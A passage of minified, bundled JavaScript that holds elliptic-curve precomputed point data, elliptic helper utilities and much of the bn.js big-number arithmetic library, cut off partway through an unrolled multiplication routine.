28260c73bb80547ae2275ba497237794c8753c"],["e2cb74fddc8e9fbcd076eef2a7c72b0ce37d50f08269dfc074b581550547a4f7","d3aa2ed71c9dd2247a62df062736eb0baddea9e36122d2be8641abcb005cc4a4"],["8438447566d4d7bedadc299496ab357426009a35f235cb141be0d99cd10ae3a8","c4e1020916980a4da5d01ac5e6ad330734ef0d7906631c4f2390426b2edd791f"],["4162d488b89402039b584c6fc6c308870587d9c46f660b878ab65c82c711d67e","67163e903236289f776f22c25fb8a3afc1732f2b84b4e95dbda47ae5a0852649"],["3fad3fa84caf0f34f0f89bfd2dcf54fc175d767aec3e50684f3ba4a4bf5f683d","cd1bc7cb6cc407bb2f0ca647c718a730cf71872e7d0d2a53fa20efcdfe61826"],["674f2600a3007a00568c1a7ce05d0816c1fb84bf1370798f1c69532faeb1a86b","299d21f9413f33b3edf43b257004580b70db57da0b182259e09eecc69e0d38a5"],["d32f4da54ade74abb81b815ad1fb3b263d82d6c692714bcff87d29bd5ee9f08f","f9429e738b8e53b968e99016c059707782e14f4535359d582fc416910b3eea87"],["30e4e670435385556e593657135845d36fbb6931f72b08cb1ed954f1e3ce3ff6","462f9bce619898638499350113bbc9b10a878d35da70740dc695a559eb88db7b"],["be2062003c51cc3004682904330e4dee7f3dcd10b01e580bf1971b04d4cad297","62188bc49d61e5428573d48a74e1c655b1c61090905682a0d5558ed72dccb9bc"],["93144423ace3451ed29e0fb9ac2af211cb6e84a601df5993c419859fff5df04a","7c10dfb164c3425f5c71a3f9d7992038f1065224f72bb9d1d902a6d13037b47c"],["b015f8044f5fcbdcf21ca26d6c34fb8197829205c7b7d2a7cb66418c157b112c","ab8c1e086d04e813744a655b2df8d5f83b3cdc6faa3088c1d3aea1454e3a1d5f"],["d5e9e1da649d97d89e4868117a465a3a4f8a18de57a140d36b3f2af341a21b52","4cb04437f391ed73111a13cc1d4dd0db1693465c2240480d8955e8592f27447a"],["d3ae41047dd7ca065dbf8ed77b992439983005cd72e16d6f996a5316d36966bb","bd1aeb21ad22ebb22a10f0303417c6d964f8cdd7df0aca614b10dc14d125ac46"],["463e2763d885f958fc66cdd22800f0a487197d0a82e377b49f80af87c897b065","bfefacdb0e5d0fd7df3a311a94de062b26b80c61fbc97508b79992671ef7ca7f"],["7985fdfd127c0567c6f53ec1bb63ec3158e597c40bfe747c83cddfc910641917","603c12daf3d9862ef2b25fe1de289aed24ed291e0ec6708703a5bd567f32ed03"],["74a1ad6b5f76e39db2dd249410eac7f99e74c59cb83d2d0ed5ff1543da7703e9","cc6157ef18c9c63cd6193d83631bbea0093e0968942e8c33d5737fd790e0db08"],["30682a50703375f602d416664ba19b7fc9bab42c72747463a71d0896b22f6da3","553e04f6b018b4fa6c8f39e7f311d3176290d0e0f19ca73f17714d9977a22ff8"],["9e2158f0d7c0d5f26c3791efefa79597654e7a2b2464f52b1ee6c1347769ef57","712fcdd1b9053f09003a3481fa7762e9ffd7c8ef35a38509e2fbf2629008373"],["176e26989a43c9cfeba4029c202538c28172e566e3c4fce7322857f3be327d66","ed8cc9d04b29eb877d270b4878dc43c19aefd31f4eee09ee7b47834c1fa4b1c3"],["75d46efea3771e6e68abb89a13ad747ecf1892393dfc4f1b7004788c50374da8","9852390a99507679fd0b86fd2b39a868d7efc22151346e1a3ca4726586a6bed8"],["809a20c67d64900ffb698c4c825f6d5f2310fb0451c869345b7319f645605721","9e994980d9917e22b76b061927fa04143d096ccc54963e6a5ebfa5f3f8e286c1"],["1b38903a43f7f114ed4500b4eac7083fdefece1cf29c63528d563446f972c180","4036edc931a60ae889353f77fd53de4a2708b26b6f5da72ad3394119daf408f9"]]}}},7e3:(Pe,we,de)=>{"use strict";var ie=we,j=de(1959),$=de(490),ae=de(4108);ie.assert=$,ie.toArray=ae.toArray,ie.zero2=ae.zero2,ie.toHex=ae.toHex,ie.encode=ae.encode,ie.getNAF=function I(b,_,y){var M=new Array(Math.max(b.bitLength(),y)+1);M.fill(0);for(var p=1<<_+1,D=b.clone(),w=0;w<M.length;w++){var x,S=D.andln(p-1);D.isOdd()?D.isubn(x=S>(p>>1)-1?(p>>1)-S:S):x=0,M[w]=x,D.iushrn(1)}return M},ie.getJSF=function Q(b,_){var y=[[],[]];b=b.clone(),_=_.clone();for(var D,M=0,p=0;b.cmpn(-M)>0||_.cmpn(-p)>0;){var S,O,w=b.andln(3)+M&3,x=_.andln(3)+p&3;3===w&&(w=-1),3===x&&(x=-1),S=0==(1&w)?0:3!=(D=b.andln(7)+M&7)&&5!==D||2!==x?w:-w,y[0].push(S),O=0==(1&x)?0:3!=(D=_.andln(7)+p&7)&&5!==D||2!==w?x:-x,y[1].push(O),2*M===S+1&&(M=1-M),2*p===O+1&&(p=1-p),b.iushrn(1),_.iushrn(1)}return y},ie.cachedProperty=function F(b,_,y){var M="_"+_;b.prototype[_]=function(){return void 0!==this[M]?this[M]:this[M]=y.call(this)}},ie.parseBytes=function E(b){return"string"==typeof b?ie.toArray(b,"hex"):b},ie.intFromLE=function g(b){return new j(b,"hex","le")}},1959:function(Pe,we,de){!function(ie,j){"use strict";function $(z,l){if(!z)throw new Error(l||"Assertion failed")}function ae(z,l){z.super_=l;var f=function(){};f.prototype=l.prototype,z.prototype=new f,z.prototype.constructor=z}function I(z,l,f){if(I.isBN(z))return z;this.negative=0,this.words=null,this.length=0,this.red=null,null!==z&&(("le"===l||"be"===l)&&(f=l,l=10),this._init(z||0,l||10,f||"be"))}var Q;"object"==typeof ie?ie.exports=I:j.BN=I,I.BN=I,I.wordSize=26;try{Q="undefined"!=typeof window&&void 0!==window.Buffer?window.Buffer:de(5568).Buffer}catch(z){}function F(z,l){var f=z.charCodeAt(l);return f>=65&&f<=70?f-55:f>=97&&f<=102?f-87:f-48&15}function E(z,l,f){var A=F(z,f);return f-1>=l&&(A|=F(z,f-1)<<4),A}function g(z,l,f,A){for(var v=0,P=Math.min(z.length,f),G=l;G<P;G++){var X=z.charCodeAt(G)-48;v*=A,v+=X>=49?X-49+10:X>=17?X-17+10:X}return v}I.isBN=function(l){return l instanceof I||null!==l&&"object"==typeof l&&l.constructor.wordSize===I.wordSize&&Array.isArray(l.words)},I.max=function(l,f){return l.cmp(f)>0?l:f},I.min=function(l,f){return l.cmp(f)<0?l:f},I.prototype._init=function(l,f,A){if("number"==typeof l)return this._initNumber(l,f,A);if("object"==typeof l)return this._initArray(l,f,A);"hex"===f&&(f=16),$(f===(0|f)&&f>=2&&f<=36);var v=0;"-"===(l=l.toString().replace(/\s+/g,""))[0]&&(v++,this.negative=1),v<l.length&&(16===f?this._parseHex(l,v,A):(this._parseBase(l,f,v),"le"===A&&this._initArray(this.toArray(),f,A)))},I.prototype._initNumber=function(l,f,A){l<0&&(this.negative=1,l=-l),l<67108864?(this.words=[67108863&l],this.length=1):l<4503599627370496?(this.words=[67108863&l,l/67108864&67108863],this.length=2):($(l<9007199254740992),this.words=[67108863&l,l/67108864&67108863,1],this.length=3),"le"===A&&this._initArray(this.toArray(),f,A)},I.prototype._initArray=function(l,f,A){if($("number"==typeof l.length),l.length<=0)return this.words=[0],this.length=1,this;this.length=Math.ceil(l.length/3),this.words=new Array(this.length);for(var v=0;v<this.length;v++)this.words[v]=0;var P,G,X=0;if("be"===A)for(v=l.length-1,P=0;v>=0;v-=3)this.words[P]|=(G=l[v]|l[v-1]<<8|l[v-2]<<16)<<X&67108863,this.words[P+1]=G>>>26-X&67108863,(X+=24)>=26&&(X-=26,P++);else if("le"===A)for(v=0,P=0;v<l.length;v+=3)this.words[P]|=(G=l[v]|l[v+1]<<8|l[v+2]<<16)<<X&67108863,this.words[P+1]=G>>>26-X&67108863,(X+=24)>=26&&(X-=26,P++);return this.strip()},I.prototype._parseHex=function(l,f,A){this.length=Math.ceil((l.length-f)/6),this.words=new Array(this.length);for(var v=0;v<this.length;v++)this.words[v]=0;var X,P=0,G=0;if("be"===A)for(v=l.length-1;v>=f;v-=2)X=E(l,f,v)<<P,this.words[G]|=67108863&X,P>=18?(P-=18,this.words[G+=1]|=X>>>26):P+=8;else for(v=(l.length-f)%2==0?f+1:f;v<l.length;v+=2)X=E(l,f,v)<<P,this.words[G]|=67108863&X,P>=18?(P-=18,this.words[G+=1]|=X>>>26):P+=8;this.strip()},I.prototype._parseBase=function(l,f,A){this.words=[0],this.length=1;for(var v=0,P=1;P<=67108863;P*=f)v++;v--,P=P/f|0;for(var G=l.length-A,X=G%v,L=Math.min(G,G-X)+A,h=0,R=A;R<L;R+=v)h=g(l,R,R+v,f),this.imuln(P),this.words[0]+h<67108864?this.words[0]+=h:this._iaddn(h);if(0!==X){var J=1;for(h=g(l,R,l.length,f),R=0;R<X;R++)J*=f;this.imuln(J),this.words[0]+h<67108864?this.words[0]+=h:this._iaddn(h)}this.strip()},I.prototype.copy=function(l){l.words=new Array(this.length);for(var f=0;f<this.length;f++)l.words[f]=this.words[f];l.length=this.length,l.negative=this.negative,l.red=this.red},I.prototype.clone=function(){var l=new I(null);return this.copy(l),l},I.prototype._expand=function(l){for(;this.length<l;)this.words[this.length++]=0;return this},I.prototype.strip=function(){for(;this.length>1&&0===this.words[this.length-1];)this.length--;return this._normSign()},I.prototype._normSign=function(){return 1===this.length&&0===this.words[0]&&(this.negative=0),this},I.prototype.inspect=function(){return(this.red?"<BN-R: ":"<BN: ")+this.toString(16)+">"};var b=["","0","00","000","0000","00000","000000","0000000","00000000","000000000","0000000000","00000000000","000000000000","0000000000000","00000000000000","000000000000000","0000000000000000","00000000000000000","000000000000000000","0000000000000000000","00000000000000000000","000000000000000000000","0000000000000000000000","00000000000000000000000","000000000000000000000000","0000000000000000000000000"],_=[0,0,25,16,12,11,10,9,8,8,7,7,7,7,6,6,6,6,6,6,6,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5],y=[0,0,33554432,43046721,16777216,48828125,60466176,40353607,16777216,43046721,1e7,19487171,35831808,62748517,7529536,11390625,16777216,24137569,34012224,47045881,64e6,4084101,5153632,6436343,7962624,9765625,11881376,14348907,17210368,20511149,243e5,28629151,33554432,39135393,45435424,52521875,60466176];function p(z,l,f){f.negative=l.negative^z.negative;var A=z.length+l.length|0;f.length=A,A=A-1|0;var v=0|z.words[0],P=0|l.words[0],G=v*P,L=G/67108864|0;f.words[0]=67108863&G;for(var h=1;h<A;h++){for(var R=L>>>26,J=67108863&L,Z=Math.min(h,l.length-1),ue=Math.max(0,h-z.length+1);ue<=Z;ue++)R+=(G=(v=0|z.words[h-ue|0])*(P=0|l.words[ue])+J)/67108864|0,J=67108863&G;f.words[h]=0|J,L=0|R}return 0!==L?f.words[h]=0|L:f.length--,f.strip()}I.prototype.toString=function(l,f){var A;if(f=0|f||1,16===(l=l||10)||"hex"===l){A="";for(var v=0,P=0,G=0;G<this.length;G++){var X=this.words[G],L=(16777215&(X<<v|P)).toString(16);A=0!=(P=X>>>24-v&16777215)||G!==this.length-1?b[6-L.length]+L+A:L+A,(v+=2)>=26&&(v-=26,G--)}for(0!==P&&(A=P.toString(16)+A);A.length%f!=0;)A="0"+A;return 0!==this.negative&&(A="-"+A),A}if(l===(0|l)&&l>=2&&l<=36){var h=_[l],R=y[l];A="";var J=this.clone();for(J.negative=0;!J.isZero();){var Z=J.modn(R).toString(l);A=(J=J.idivn(R)).isZero()?Z+A:b[h-Z.length]+Z+A}for(this.isZero()&&(A="0"+A);A.length%f!=0;)A="0"+A;return 0!==this.negative&&(A="-"+A),A}$(!1,"Base should be between 2 and 36")},I.prototype.toNumber=function(){var l=this.words[0];return 2===this.length?l+=67108864*this.words[1]:3===this.length&&1===this.words[2]?l+=4503599627370496+67108864*this.words[1]:this.length>2&&$(!1,"Number can only safely store up to 53 bits"),0!==this.negative?-l:l},I.prototype.toJSON=function(){return this.toString(16)},I.prototype.toBuffer=function(l,f){return $(void 0!==Q),this.toArrayLike(Q,l,f)},I.prototype.toArray=function(l,f){return this.toArrayLike(Array,l,f)},I.prototype.toArrayLike=function(l,f,A){var v=this.byteLength(),P=A||Math.max(1,v);$(v<=P,"byte array longer than desired length"),$(P>0,"Requested array length <= 0"),this.strip();var L,h,G="le"===f,X=new l(P),R=this.clone();if(G){for(h=0;!R.isZero();h++)L=R.andln(255),R.iushrn(8),X[h]=L;for(;h<P;h++)X[h]=0}else{for(h=0;h<P-v;h++)X[h]=0;for(h=0;!R.isZero();h++)L=R.andln(255),R.iushrn(8),X[P-h-1]=L}return X},I.prototype._countBits=Math.clz32?function(l){return 32-Math.clz32(l)}:function(l){var f=l,A=0;return f>=4096&&(A+=13,f>>>=13),f>=64&&(A+=7,f>>>=7),f>=8&&(A+=4,f>>>=4),f>=2&&(A+=2,f>>>=2),A+f},I.prototype._zeroBits=function(l){if(0===l)return 26;var f=l,A=0;return 0==(8191&f)&&(A+=13,f>>>=13),0==(127&f)&&(A+=7,f>>>=7),0==(15&f)&&(A+=4,f>>>=4),0==(3&f)&&(A+=2,f>>>=2),0==(1&f)&&A++,A},I.prototype.bitLength=function(){var f=this._countBits(this.words[this.length-1]);return 26*(this.length-1)+f},I.prototype.zeroBits=function(){if(this.isZero())return 0;for(var l=0,f=0;f<this.length;f++){var A=this._zeroBits(this.words[f]);if(l+=A,26!==A)break}return l},I.prototype.byteLength=function(){return Math.ceil(this.bitLength()/8)},I.prototype.toTwos=function(l){return 0!==this.negative?this.abs().inotn(l).iaddn(1):this.clone()},I.prototype.fromTwos=function(l){return this.testn(l-1)?this.notn(l).iaddn(1).ineg():this.clone()},I.prototype.isNeg=function(){return 0!==this.negative},I.prototype.neg=function(){return this.clone().ineg()},I.prototype.ineg=function(){return this.isZero()||(this.negative^=1),this},I.prototype.iuor=function(l){for(;this.length<l.length;)this.words[this.length++]=0;for(var f=0;f<l.length;f++)this.words[f]=this.words[f]|l.words[f];return this.strip()},I.prototype.ior=function(l){return $(0==(this.negative|l.negative)),this.iuor(l)},I.prototype.or=function(l){return this.length>l.length?this.clone().ior(l):l.clone().ior(this)},I.prototype.uor=function(l){return this.length>l.length?this.clone().iuor(l):l.clone().iuor(this)},I.prototype.iuand=function(l){var f;f=this.length>l.length?l:this;for(var A=0;A<f.length;A++)this.words[A]=this.words[A]&l.words[A];return this.length=f.length,this.strip()},I.prototype.iand=function(l){return $(0==(this.negative|l.negative)),this.iuand(l)},I.prototype.and=function(l){return this.length>l.length?this.clone().iand(l):l.clone().iand(this)},I.prototype.uand=function(l){return this.length>l.length?this.clone().iuand(l):l.clone().iuand(this)},I.prototype.iuxor=function(l){var f,A;this.length>l.length?(f=this,A=l):(f=l,A=this);for(var v=0;v<A.length;v++)this.words[v]=f.words[v]^A.words[v];if(this!==f)for(;v<f.length;v++)this.words[v]=f.words[v];return this.length=f.length,this.strip()},I.prototype.ixor=function(l){return $(0==(this.negative|l.negative)),this.iuxor(l)},I.prototype.xor=function(l){return this.length>l.length?this.clone().ixor(l):l.clone().ixor(this)},I.prototype.uxor=function(l){return this.length>l.length?this.clone().iuxor(l):l.clone().iuxor(this)},I.prototype.inotn=function(l){$("number"==typeof l&&l>=0);var f=0|Math.ceil(l/26),A=l%26;this._expand(f),A>0&&f--;for(var v=0;v<f;v++)this.words[v]=67108863&~this.words[v];return A>0&&(this.words[v]=~this.words[v]&67108863>>26-A),this.strip()},I.prototype.notn=function(l){return this.clone().inotn(l)},I.prototype.setn=function(l,f){$("number"==typeof l&&l>=0);var A=l/26|0,v=l%26;return this._expand(A+1),this.words[A]=f?this.words[A]|1<<v:this.words[A]&~(1<<v),this.strip()},I.prototype.iadd=function(l){var f,A,v;if(0!==this.negative&&0===l.negative)return this.negative=0,f=this.isub(l),this.negative^=1,this._normSign();if(0===this.negative&&0!==l.negative)return l.negative=0,f=this.isub(l),l.negative=1,f._normSign();this.length>l.length?(A=this,v=l):(A=l,v=this);for(var P=0,G=0;G<v.length;G++)this.words[G]=67108863&(f=(0|A.words[G])+(0|v.words[G])+P),P=f>>>26;for(;0!==P&&G<A.length;G++)this.words[G]=67108863&(f=(0|A.words[G])+P),P=f>>>26;if(this.length=A.length,0!==P)this.words[this.length]=P,this.length++;else if(A!==this)for(;G<A.length;G++)this.words[G]=A.words[G];return this},I.prototype.add=function(l){var f;return 0!==l.negative&&0===this.negative?(l.negative=0,f=this.sub(l),l.negative^=1,f):0===l.negative&&0!==this.negative?(this.negative=0,f=l.sub(this),this.negative=1,f):this.length>l.length?this.clone().iadd(l):l.clone().iadd(this)},I.prototype.isub=function(l){if(0!==l.negative){l.negative=0;var f=this.iadd(l);return l.negative=1,f._normSign()}if(0!==this.negative)return this.negative=0,this.iadd(l),this.negative=1,this._normSign();var v,P,A=this.cmp(l);if(0===A)return this.negative=0,this.length=1,this.words[0]=0,this;A>0?(v=this,P=l):(v=l,P=this);for(var G=0,X=0;X<P.length;X++)G=(f=(0|v.words[X])-(0|P.words[X])+G)>>26,this.words[X]=67108863&f;for(;0!==G&&X<v.length;X++)G=(f=(0|v.words[X])+G)>>26,this.words[X]=67108863&f;if(0===G&&X<v.length&&v!==this)for(;X<v.length;X++)this.words[X]=v.words[X];return this.length=Math.max(this.length,X),v!==this&&(this.negative=1),this.strip()},I.prototype.sub=function(l){return this.clone().isub(l)};var D=function(l,f,A){var L,h,R,v=l.words,P=f.words,G=A.words,X=0,J=0|v[0],Z=8191&J,ue=J>>>13,Ie=0|v[1],Ae=8191&Ie,Ue=Ie>>>13,Xe=0|v[2],He=8191&Xe,Be=Xe>>>13,qe=0|v[3],De=8191&qe,Ve=qe>>>13,ze=0|v[4],me=8191&ze,Ke=ze>>>13,rt=0|v[5],Ge=8191&rt,Qe=rt>>>13,ht=0|v[6],mt=8191&ht,lt=ht>>>13,ft=0|v[7],xe=8191&ft,We=ft>>>13,Je=0|v[8],Oe=8191&Je,Te=Je>>>13,Le=0|v[9],$e=8191&Le,st=Le>>>13,xt=0|P[0],pt=8191&xt,vt=xt>>>13,Wi=0|P[1],Ft=8191&Wi,zt=Wi>>>13,fa=0|P[2],Jt=8191&fa,Gt=fa>>>13,Co=0|P[3],jt=8191&Co,qt=Co>>>13,Qn=0|P[4],Kt=8191&Qn,Zt=Qn>>>13,Bo=0|P[5],ti=8191&Bo,ii=Bo>>>13,pn=0|P[6],Pt=8191&pn,Xt=pn>>>13,Ho=0|P[7],Qt=8191&Ho,ei=Ho>>>13,$o=0|P[8],ai=8191&$o,$t=$o>>>13,zo=0|P[9],Ut=8191&zo,Yt=zo>>>13;A.negative=l.negative^f.negative,A.length=19;var ua=(X+(L=Math.imul(Z,pt))|0)+((8191&(h=(h=Math.imul(Z,vt))+Math.imul(ue,pt)|0))<<13)|0;X=((R=Math.imul(ue,vt))+(h>>>13)|0)+(ua>>>26)|0,ua&=67108863,L=Math.imul(Ae,pt),h=(h=Math.imul(Ae,vt))+Math.imul(Ue,pt)|0,R=Math.imul(Ue,vt);var Ha=(X+(L=L+Math.imul(Z,Ft)|0)|0)+((8191&(h=(h=h+Math.imul(Z,zt)|0)+Math.imul(ue,Ft)|0))<<13)|0;X=((R=R+Math.imul(ue,zt)|0)+(h>>>13)|0)+(Ha>>>26)|0,Ha&=67108863,L=Math.imul(He,pt),h=(h=Math.imul(He,vt))+Math.imul(Be,pt)|0,R=Math.imul(Be,vt),L=L+Math.imul(Ae,Ft)|0,h=(h=h+Math.imul(Ae,zt)|0)+Math.imul(Ue,Ft)|0,R=R+Math.imul(Ue,zt)|0;var Va=(X+(L=L+Math.imul(Z,Jt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Gt)|0)+Math.imul(ue,Jt)|0))<<13)|0;X=((R=R+Math.imul(ue,Gt)|0)+(h>>>13)|0)+(Va>>>26)|0,Va&=67108863,L=Math.imul(De,pt),h=(h=Math.imul(De,vt))+Math.imul(Ve,pt)|0,R=Math.imul(Ve,vt),L=L+Math.imul(He,Ft)|0,h=(h=h+Math.imul(He,zt)|0)+Math.imul(Be,Ft)|0,R=R+Math.imul(Be,zt)|0,L=L+Math.imul(Ae,Jt)|0,h=(h=h+Math.imul(Ae,Gt)|0)+Math.imul(Ue,Jt)|0,R=R+Math.imul(Ue,Gt)|0;var co=(X+(L=L+Math.imul(Z,jt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,qt)|0)+Math.imul(ue,jt)|0))<<13)|0;X=((R=R+Math.imul(ue,qt)|0)+(h>>>13)|0)+(co>>>26)|0,co&=67108863,L=Math.imul(me,pt),h=(h=Math.imul(me,vt))+Math.imul(Ke,pt)|0,R=Math.imul(Ke,vt),L=L+Math.imul(De,Ft)|0,h=(h=h+Math.imul(De,zt)|0)+Math.imul(Ve,Ft)|0,R=R+Math.imul(Ve,zt)|0,L=L+Math.imul(He,Jt)|0,h=(h=h+Math.imul(He,Gt)|0)+Math.imul(Be,Jt)|0,R=R+Math.imul(Be,Gt)|0,L=L+Math.imul(Ae,jt)|0,h=(h=h+Math.imul(Ae,qt)|0)+Math.imul(Ue,jt)|0,R=R+Math.imul(Ue,qt)|0;var io=(X+(L=L+Math.imul(Z,Kt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Zt)|0)+Math.imul(ue,Kt)|0))<<13)|0;X=((R=R+Math.imul(ue,Zt)|0)+(h>>>13)|0)+(io>>>26)|0,io&=67108863,L=Math.imul(Ge,pt),h=(h=Math.imul(Ge,vt))+Math.imul(Qe,pt)|0,R=Math.imul(Qe,vt),L=L+Math.imul(me,Ft)|0,h=(h=h+Math.imul(me,zt)|0)+Math.imul(Ke,Ft)|0,R=R+Math.imul(Ke,zt)|0,L=L+Math.imul(De,Jt)|0,h=(h=h+Math.imul(De,Gt)|0)+Math.imul(Ve,Jt)|0,R=R+Math.imul(Ve,Gt)|0,L=L+Math.imul(He,jt)|0,h=(h=h+Math.imul(He,qt)|0)+Math.imul(Be,jt)|0,R=R+Math.imul(Be,qt)|0,L=L+Math.imul(Ae,Kt)|0,h=(h=h+Math.imul(Ae,Zt)|0)+Math.imul(Ue,Kt)|0,R=R+Math.imul(Ue,Zt)|0;var yo=(X+(L=L+Math.imul(Z,ti)|0)|0)+((8191&(h=(h=h+Math.imul(Z,ii)|0)+Math.imul(ue,ti)|0))<<13)|0;X=((R=R+Math.imul(ue,ii)|0)+(h>>>13)|0)+(yo>>>26)|0,yo&=67108863,L=Math.imul(mt,pt),h=(h=Math.imul(mt,vt))+Math.imul(lt,pt)|0,R=Math.imul(lt,vt),L=L+Math.imul(Ge,Ft)|0,h=(h=h+Math.imul(Ge,zt)|0)+Math.imul(Qe,Ft)|0,R=R+Math.imul(Qe,zt)|0,L=L+Math.imul(me,Jt)|0,h=(h=h+Math.imul(me,Gt)|0)+Math.imul(Ke,Jt)|0,R=R+Math.imul(Ke,Gt)|0,L=L+Math.imul(De,jt)|0,h=(h=h+Math.imul(De,qt)|0)+Math.imul(Ve,jt)|0,R=R+Math.imul(Ve,qt)|0,L=L+Math.imul(He,Kt)|0,h=(h=h+Math.imul(He,Zt)|0)+Math.imul(Be,Kt)|0,R=R+Math.imul(Be,Zt)|0,L=L+Math.imul(Ae,ti)|0,h=(h=h+Math.imul(Ae,ii)|0)+Math.imul(Ue,ti)|0,R=R+Math.imul(Ue,ii)|0;var Vn=(X+(L=L+Math.imul(Z,Pt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Xt)|0)+Math.imul(ue,Pt)|0))<<13)|0;X=((R=R+Math.imul(ue,Xt)|0)+(h>>>13)|0)+(Vn>>>26)|0,Vn&=67108863,L=Math.imul(xe,pt),h=(h=Math.imul(xe,vt))+Math.imul(We,pt)|0,R=Math.imul(We,vt),L=L+Math.imul(mt,Ft)|0,h=(h=h+Math.imul(mt,zt)|0)+Math.imul(lt,Ft)|0,R=R+Math.imul(lt,zt)|0,L=L+Math.imul(Ge,Jt)|0,h=(h=h+Math.imul(Ge,Gt)|0)+Math.imul(Qe,Jt)|0,R=R+Math.imul(Qe,Gt)|0,L=L+Math.imul(me,jt)|0,h=(h=h+Math.imul(me,qt)|0)+Math.imul(Ke,jt)|0,R=R+Math.imul(Ke,qt)|0,L=L+Math.imul(De,Kt)|0,h=(h=h+Math.imul(De,Zt)|0)+Math.imul(Ve,Kt)|0,R=R+Math.imul(Ve,Zt)|0,L=L+Math.imul(He,ti)|0,h=(h=h+Math.imul(He,ii)|0)+Math.imul(Be,ti)|0,R=R+Math.imul(Be,ii)|0,L=L+Math.imul(Ae,Pt)|0,h=(h=h+Math.imul(Ae,Xt)|0)+Math.imul(Ue,Pt)|0,R=R+Math.imul(Ue,Xt)|0;var Eo=(X+(L=L+Math.imul(Z,Qt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,ei)|0)+Math.imul(ue,Qt)|0))<<13)|0;X=((R=R+Math.imul(ue,ei)|0)+(h>>>13)|0)+(Eo>>>26)|0,Eo&=67108863,L=Math.imul(Oe,pt),h=(h=Math.imul(Oe,vt))+Math.imul(Te,pt)|0,R=Math.imul(Te,vt),L=L+Math.imul(xe,Ft)|0,h=(h=h+Math.imul(xe,zt)|0)+Math.imul(We,Ft)|0,R=R+Math.imul(We,zt)|0,L=L+Math.imul(mt,Jt)|0,h=(h=h+Math.imul(mt,Gt)|0)+Math.imul(lt,Jt)|0,R=R+Math.imul(lt,Gt)|0,L=L+Math.imul(Ge,jt)|0,h=(h=h+Math.imul(Ge,qt)|0)+Math.imul(Qe,jt)|0,R=R+Math.imul(Qe,qt)|0,L=L+Math.imul(me,Kt)|0,h=(h=h+Math.imul(me,Zt)|0)+Math.imul(Ke,Kt)|0,R=R+Math.imul(Ke,Zt)|0,L=L+Math.imul(De,ti)|0,h=(h=h+Math.imul(De,ii)|0)+Math.imul(Ve,ti)|0,R=R+Math.imul(Ve,ii)|0,L=L+Math.imul(He,Pt)|0,h=(h=h+Math.imul(He,Xt)|0)+Math.imul(Be,Pt)|0,R=R+Math.imul(Be,Xt)|0,L=L+Math.imul(Ae,Qt)|0,h=(h=h+Math.imul(Ae,ei)|0)+Math.imul(Ue,Qt)|0,R=R+Math.imul(Ue,ei)|0;var Pn=(X+(L=L+Math.imul(Z,ai)|0)|0)+((8191&(h=(h=h+Math.imul(Z,$t)|0)+Math.imul(ue,ai)|0))<<13)|0;X=((R=R+Math.imul(ue,$t)|0)+(h>>>13)|0)+(Pn>>>26)|0,Pn&=67108863,L=Math.imul($e,pt),h=(h=Math.imul($e,vt))+Math.imul(st,pt)|0,R=Math.imul(st,vt),L=L+Math.imul(Oe,Ft)|0,h=(h=h+Math.imul(Oe,zt)|0)+Math.imul(Te,Ft)|0,R=R+Math.imul(Te,zt)|0,L=L+Math.imul(xe,Jt)|0,h=(h=h+Math.imul(xe,Gt)|0)+Math.imul(We,Jt)|0,R=R+Math.imul(We,Gt)|0,L=L+Math.imul(mt,jt)|0,h=(h=h+Math.imul(mt,qt)|0)+Math.imul(lt,jt)|0,R=R+Math.imul(lt,qt)|0,L=L+Math.imul(Ge,Kt)|0,h=(h=h+Math.imul(Ge,Zt)|0)+Math.imul(Qe,Kt)|0,R=R+Math.imul(Qe,Zt)|0,L=L+Math.imul(me,ti)|0,h=(h=h+Math.imul(me,ii)|0)+Math.imul(Ke,ti)|0,R=R+Math.imul(Ke,ii)|0,L=L+Math.imul(De,Pt)|0,h=(h=h+Math.imul(De,Xt)|0)+Math.imul(Ve,Pt)|0,R=R+Math.imul(Ve,Xt)|0,L=L+Math.imul(He,Qt)|0,h=(h=h+Math.imul(He,ei)|0)+Math.imul(Be,Qt)|0,R=R+Math.imul(Be,ei)|0,L=L+Math.imul(Ae,ai)|0,h=(h=h+Math.imul(Ae,$t)|0)+Math.imul(Ue,ai)|0,R=R+Math.imul(Ue,$t)|0;var lo=(X+(L=L+Math.imul(Z,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Yt)|0)+Math.imul(ue,Ut)|0))<<13)|0;X=((R=R+Math.imul(ue,Yt)|0)+(h>>>13)|0)+(lo>>>26)|0,lo&=67108863,L=Math.imul($e,Ft),h=(h=Math.imul($e,zt))+Math.imul(st,Ft)|0,R=Math.imul(st,zt),L=L+Math.imul(Oe,Jt)|0,h=(h=h+Math.imul(Oe,Gt)|0)+Math.imul(Te,Jt)|0,R=R+Math.imul(Te,Gt)|0,L=L+Math.imul(xe,jt)|0,h=(h=h+Math.imul(xe,qt)|0)+Math.imul(We,jt)|0,R=R+Math.imul(We,qt)|0,L=L+Math.imul(mt,Kt)|0,h=(h=h+Math.imul(mt,Zt)|0)+Math.imul(lt,Kt)|0,R=R+Math.imul(lt,Zt)|0,L=L+Math.imul(Ge,ti)|0,h=(h=h+Math.imul(Ge,ii)|0)+Math.imul(Qe,ti)|0,R=R+Math.imul(Qe,ii)|0,L=L+Math.imul(me,Pt)|0,h=(h=h+Math.imul(me,Xt)|0)+Math.imul(Ke,Pt)|0,R=R+Math.imul(Ke,Xt)|0,L=L+Math.imul(De,Qt)|0,h=(h=h+Math.imul(De,ei)|0)+Math.imul(Ve,Qt)|0,R=R+Math.imul(Ve,ei)|0,L=L+Math.imul(He,ai)|0,h=(h=h+Math.imul(He,$t)|0)+Math.imul(Be,ai)|0,R=R+Math.imul(Be,$t)|0;var 